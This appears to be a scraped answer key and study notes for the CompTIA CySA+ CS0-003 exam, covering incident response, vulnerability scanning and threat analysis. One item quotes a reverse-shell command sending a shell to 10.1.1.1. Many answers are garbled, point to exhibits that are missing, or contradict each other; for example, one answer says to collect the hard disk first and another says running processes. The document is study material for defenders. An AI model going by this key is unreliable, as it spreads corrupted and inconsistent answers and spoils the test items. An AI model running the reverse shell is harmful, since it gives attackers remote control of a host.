CompTIA CySA+ CS0-003 Exam Prep

Questions and Answers

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately? (Select all that apply)

Reimage the server

Quarantine the server (correct)

Update the OS to latest version

Shut down the server

A security analyst is performing vulnerability scans on the network. Which of the following would be missing from a scan performed with a scanner appliance configuration? (Select all that apply)

Operating system version

Open ports

IP address

Registry key values (correct)

A security administrator has been notified that some vulnerability reports contain an incomplete list of findings. Which method should be used to resolve this issue? (Select all that apply)

External scan

Network scan

Differential scan

Credentialed scan (correct)

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests from an internal host to a blocklisted external server. What best describes this activity? (Select all that apply)

Beaconing

A technician is analyzing output from a network mapping tool for a PCI audit. Which of the following best describes the output? (Select all that apply)

The host is allowing insecure cipher suites

Which of the following CVE metrics would be most accurate for a zero-day threat that requires no user interaction or privilege escalation and significantly impacts confidentiality and integrity but not availability?

CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: H/A: L

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

DLP

Which tuning recommendation should the security analyst share after observing vulnerabilities in a web application?

Block requests without an X-Frame-Options header

Which items should be included in a vulnerability scan report? (Choose two)

Risk score

What would best protect an organization if exploitation of new attacks is happening approximately 45 days after a patch is released?

A mean time to remediate of 30 days

Which scripting language is being used in a production script if it contains specific syntax such as cmdlets?

PowerShell

What most likely describes the activity where a company's internal portal is sometimes accessible only via HTTP?

An on-path attack is being performed by someone with internal access that forces users into port 80

According to the security policy, which vulnerability should be the highest priority to patch?

Option C

Which of the following most accurately describes the result of the Nmap scan?

The vulnerable parameter and characters > and " with a reflected XSS attempt

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

Schedule a review with all teams to discuss what occurred

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Disaster recovery plan

Which of the following is the best technique to perform the analysis of a malicious binary file?

Reverse engineering

Which solution will assist in reducing shadow IT in the enterprise?

Deploy a CASB and enable policy enforcement

Which of the following pieces of data should be collected first to preserve sensitive information before isolating the server?

Hard disk

Which logs should the incident response team review first when investigating an internet outage caused by a DDoS attack?

DNS

Which of the following security operations tasks are ideal for automation?

Email header analysis

Which stage of the Cyber Kill Chain best describes a malicious actor who has gained access to an internal network through social engineering?

Exploitation

Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

Card issuer

What step of an attack framework does an analyst notice if an external IP address is being used to conduct scans across external-facing assets?

Reconnaissance

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

Mean time to detect

What best describes the activity of multiple emails targeting company administrators with concealed URLs leading to unknown websites?

Social engineering attack

What recommendation would best mitigate recurrent vulnerabilities in a critical application if applied during the SDLC phase?

Use application security scanning as part of the pipeline for the CI/CD flow

Which of the following implications should be considered for a company moving to a hybrid IaaS cloud environment?

Cloud-specific misconfigurations may not be detected by the current scanners

Which of the following is the best way to ensure that an investigation complies with HR or privacy policies?

Ensure that the case details do not reflect any user-identifiable information. Password protect the evidence and restrict access to personnel related to the investigation.

What do the critical systems represent if they cannot be upgraded due to a vendor appliance the company does not have access to?

Proprietary systems

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

Agree on the goals and objectives of the plan

Which step should be taken next in the remediation process after applying a software patch?

Validation

Which of the following has occurred based on the endpoint log entry reviewed?

New account introduced

What best describes what the security program did by integrating security controls into a SIEM?

Single pane of glass

Which of the following choices should the analyst look at first during a network discovery?

p4wnp1_aloa.lan (192.168.86.56)

What must be done first when starting an investigation?

Secure the scene

After conducting a cybersecurity risk assessment for a new software request, what risk management principle did the CISO select?

Avoid

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

Identify any improvements or changes in the incident response plan or procedures

What process involves removing duplicate or redundant data from a data set?

Deduplication

Which framework would a security analyst most likely use to compare TTPs between different known adversaries?

MITRE ATT&CK

What step describes removing a vulnerability from the system during incident remediation?

Eradication

What is the best action for the incident response team to recommend regarding Joe's situation?

Perform no action until HR or legal counsel advises on next steps

What should be the priority for a new program to reduce attack surface risks as part of a zero trust approach?

Reduce the administrator and privileged access accounts

Which action should an analyst take first when wanting to investigate a security incident on a server?

Clone the virtual server for forensic analysis

What is the most likely explanation for the outgoing HTTPS connections observed by the systems administrator?

C2 beaconing activity

To ensure new employees are accountable for following company policy regarding personal devices, what should the SOC manager recommend?

All new employees must sign a user agreement to acknowledge the company security policy

Which threat intelligence source is best to learn about a new ransomware campaign targeting a critical supply chain?

Information sharing organization

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

The lead should review what is documented in the incident response policy or plan

What is the most likely reason to include lessons learned in an after-action report?

To identify areas of improvement in the incident response process

Which of the following will produce the data needed for an executive briefing on possible threats to the organization?

Indicators of compromise

Using the third-party scoring system, which vulnerabilities should be patched first?

TSpirit: Cobain: Yes, Grohl: Yes, Novo: Yes, Smear: No, Channing: No

What has the user become after downloading malware onto a computer that infects other systems?

Insider threat

Which of the following describes what the analyst has noticed about an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP?

Beaconing

Which of the following can the analyst perform to see the entire contents of the downloaded files in Wireshark?

Change the display filter to ftp-data and follow the TCP streams

Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

SLA

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

Command and control

Which of the following would best meet a company’s requirement for implementing a vulnerability scanning method with reduced network traffic?

Agent-based

Which of the following is being attempted by the command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l?

Reverse shell

Which of the following factors would an analyst most likely communicate as the reason for the escalation of a CVE to a higher vulnerability score?

Weaponization

Which system should be prioritized for patching first among the following?

54.74.110.228

Which scanning method can be implemented to reduce access to systems while providing the most accurate vulnerability scan results?

Agent-based scanning

Which function can an analyst use on a shell script to identify anomalies on the network routing most accurately?

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }

Which of the following security controls would best support the company to improve its security posture against sensitive information being disclosed via file sharing services?

Improve employee training and awareness

What is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?

Determine the sophistication of the audience that the report is meant for

Which of the following actions would allow the analyst to gather intelligence without disclosing information to the attackers regarding the malware binaries?

Upload the binary to an air-gapped sandbox for analysis

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

SOAR

After isolating a compromised server from the network, which action should the CSIRT conduct next?

Take a snapshot of the compromised server and verify its integrity

What must be collected first in a computer system related to evidence volatility?

Running processes

Which shell script function helps identify possible network addresses from different source networks?

function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F '.in-addr' '{print $1}').origin.asn.cymru.com TXT +short }

Which shell script function should a security analyst use to identify IP addresses from the same country?

function x() { info=$(geoiplookup $1) && echo '$1 | $info' }

What should be completed first to remediate findings from a vulnerability assessment on a web server?

Perform proper sanitization on all fields

What is the most likely vulnerability indicated by hard-coded credentials in the output of a debugger command?

Hard-coded credential

Which best practice should a company follow with a proxy that has high-severity vulnerabilities but is currently not in use?

Decommission the proxy

Which log entry provides evidence of an attempted exploit of a zero-day command injection vulnerability?

Log entry 4

What is the most important factor to ensure accurate incident response reporting?

A well-defined timeline of the events

What is the best mitigation technique for unusual network scanning activity from a country the company does not do business with?

Geoblock the offending source country

What is the best step to preserve evidence when an employee is suspected of misusing a company-issued laptop?

Make a forensic image of the device and create a SRA-I hash

Which system should be prioritized for remediation based on the highest risk score and number of affected users?

brady

Which vulnerability type is being validated by trying to inject a script tag into a web application?

XSS

Study Notes

Zero-Day Vulnerability

• A zero-day vulnerability requires no user interaction or privilege escalation.
• Significant impacts: confidentiality and integrity are high; availability impact is low.
• CVE metric selected: AV:N, AC:L, PR:N, UI:N, S:U, C:H, I:H, A:L (Answer A).

Data Loss Prevention (DLP)

• DLP tools monitor, detect, and block sensitive data.
• Effective for preventing exposure of Personally Identifiable Information (PII) outside an organization.

Web Application Vulnerability Assessment

• Tuning recommendation: Block requests without an X-Frame-Options header to prevent clickjacking attacks.

Vulnerability Scan Report

• Key components: Affected hosts and Risk score, detailing systems and severity of vulnerabilities.

Remediation Timing

• Mean Time to Remediate (MTTR) of 30 days is ideal to protect against exploits occurring 45 days post-patch release.

Scripting Language Identification

• Recognizing PowerShell syntax (cmdlets, parameters) indicates the use of PowerShell in scripts.

Anomaly in Internal Portal Access

• Occasional accessibility via HTTP suggests an on-path attack, forcing users into non-secure port 80.

Vulnerability Prioritization

• Highest priority vulnerabilities are identified using CVSS metrics, emphasizing confidentiality and public-facing issues.

Business Continuity and Disaster Recovery

• A Disaster Recovery Plan ensures mission-critical services remain available during incidents.

Cloud Access Security Broker (CASB)

• A CASB reduces risk of shadow IT by providing control and visibility over cloud applications.

DDoS Attack Investigation

• First logs to review: DNS logs, as they can reveal disruptions stemming from DDoS attacks.

Cyber Kill Chain Stages

• Current stage in attack involving retained access through social engineering is Exploitation.

Attack Framework Step

• Analysts observing external scans on a company network witness the Reconnaissance phase.

Social Engineering and Malicious Links

• An attack targeting administrators with concealed URLs exemplifies a social engineering attack using obfuscated links.

Continuous Integration/Continuous Delivery (CI/CD) and Security

• Integrating application security scanning into the CI/CD pipeline mitigates persistent vulnerabilities in production applications.

Proprietary Systems Inhibiting Remediation

• Critical systems unupgradeable due to vendor restrictions exemplify proprietary systems as inhibitors to remediation.

Reflected XSS Attack Detection

• An Nmap scan demonstrating the return of unsanitized characters indicates vulnerability to reflected XSS.

Post-Incident Review

• Scheduling a review meeting with all teams post-incident is essential for improving future incident response effectiveness.### Incident Review and Analysis
• Lessons learned sessions or after-action reports are crucial for identifying root causes of incidents.
• These reviews evaluate incident response effectiveness and document security control weaknesses.
• Recommendations for corrective actions and preventive measures are made based on findings.

Malicious Binary Analysis

• Reverse engineering is the most effective technique for analyzing malicious binary files.
• It helps in understanding structure, functionality, and behavior of malware.
• Tools used include disassemblers, debuggers, and decompilers.

Evidence Collection during Incidents

• First priority in evidence collection: hard disk to preserve sensitive information.
• Hard disks contain comprehensive data, including possible evidence of malicious activities.
• Proper forensic techniques ensure integrity when collecting evidence.

Automation of Security Operations

• Email header analysis is a prime candidate for automation due to specific indicators of phishing.
• Automated systems can efficiently parse and analyze email headers, enhancing security.

Reporting Breaches Under PCI DSS

• Organizations must report breaches to the card issuer, the financial institution responsible for customer transactions.
• Other notifications may depend on the breach's nature and scope but the card issuer is the primary contact.

Security Metrics Focus

• Mean time to detect (MTTD) is a critical metric for organizations investing in SIEM and SOAR systems.
• MTTD measures the time to identify a security incident and can be improved with integrated tools.

Vulnerability Management in Hybrid Environments

• Cloud-specific misconfigurations can go undetected with current on-premises vulnerability scanners.
• A shift to a hybrid IaaS environment requires updated scanning techniques to account for cloud resources.

Investigation Compliance

• To comply with HR or privacy policies during an investigation, sensitive user data should be omitted from case details.
• Evidence access should be restricted and password-protected to ensure privacy.

Disaster Recovery Plan Development

• The first step in developing a disaster recovery plan is agreeing on the goals and objectives.
• Goals should align with business needs, focusing on minimizing downtime and ensuring data integrity.

Software Patch Remediation

• After applying a software patch, the next step is validation to ensure its success and no adverse effects.

Endpoint Log Analysis

• Identifying new accounts, especially with administrative privileges, can indicate malicious activity.

Integration of Security Tools

• A single pane of glass approach creates a unified interface across security tools, improving efficiency and reducing incident response time.

Network Discovery with Nmap

• Suspicion should be directed first to devices with names associated with potential attacks or exploitation tools.

Scene Security in Investigations

• Securing the scene before any evidence collection is crucial to prevent contamination and preserve data integrity.

CSIRT Communication During Incidents

• Communication protocols should be outlined in the incident response policy to ensure timely information sharing.

Threat Briefings for Executives

• Indicators of compromise (IoCs) provide critical data for assessing potential threats to the organization.

Analysis of Malicious HTTP Traffic

• Observing internal devices sending suspicious HTTP requests to known malicious IPs suggests beaconing activity.

Capturing File Transfers in Wireshark

• To view the contents of files in FTP sessions, analysts should filter for ftp-data and follow TCP streams to see full transfer data.### SOC Management and Compliance
• SLA (Service Level Agreement) defines expectations and contractual obligations between a service provider and a customer, including metrics for compliance.
• A SOC manager needs to review the SLA to ensure appropriate remediation responses were delivered in a timely manner to meet contractual obligations.

Cyber Kill Chain

• Command and Control (C2) phase involves establishing communication with a successfully exploited target, allowing adversaries to control compromised systems.
• C2 methods may include malware callbacks, backdoors, and covert channels for remote manipulation or data exfiltration.

Vulnerability Scanning Approaches

• Agent-based vulnerability scanning installs software on target systems to perform local scans, reducing network traffic and providing accurate results.
• A preferred option for companies with dynamic IPs seeking minimal network impact during scanning.

Exploit Detection

• A detected command attempting to create a reverse shell connection indicates an exploit aimed at allowing remote command execution on a target system.

Vulnerability Assessment Metrics

• An increase in a CVE vulnerability score due to weaponization affects escalation; weaponization involves using an exploit to achieve malicious objectives.

Prioritizing Patch Management

• Systems with critical vulnerabilities should be prioritized for patching; a system with multiple high-severity vulnerabilities poses a greater risk.

Effective Vulnerability Management

• Agent-based scanning can reduce access needs while still producing accurate results by scanning local systems without credentials.

Anomaly Detection in Network Routing

• Utilizing DNS lookups can help identify anomalies in network routing effectively through a shell script.

Information Disclosure via File Sharing

• Improving employee training and awareness is critical in reducing the risks associated with sensitive information disclosures through file sharing services.

Incident Report Preparation

• Understanding the audience's sophistication levels is essential for preparing effective incident reports, tailoring content to their knowledge and expectations.

Malware Analysis

• An air gapped sandbox allows for safe malware analysis without risking exposure to external networks or attackers.

Security Operations Improvement

• SOAR (Security Orchestration, Automation, and Response) enhances operational efficiency by automating processes and minimizing human involvement.

Risk Management Principles

• Avoidance is a risk management strategy where an unacceptable risk leads to the decision not to proceed with an action, such as rejecting software requests.

Post-Incident Review

• Lessons learned should focus on identifying improvements or changes needed in incident response plans to enhance future security posture and readiness.

Threat Intelligence Consolidation

• Deduplication is essential for consolidating threat intelligence feeds by eliminating redundant data, thereby enhancing clarity and relevance.

TTP Comparison Using MITRE Framework

• MITRE ATT&CK provides a framework for comparing Tactics, Techniques, and Procedures (TTPs) of different adversaries, aiding in threat assessment.

Incident Response Steps

• Eradication involves removing vulnerabilities or threats from a system post-incident to restore it to a secure state.

Competitive Threat from Employee

• An employee publicly announcing their departure and soliciting current clients for a competing venture raises concerns about potential ethical breaches and sensitive information security.

Description

Prepare for the CompTIA CyberSecurity Analyst CySA+ CS0-003 exam with this comprehensive quiz. It includes questions on the latest cybersecurity vulnerabilities and threat analysis techniques. Sharpen your skills and get ready for the certification.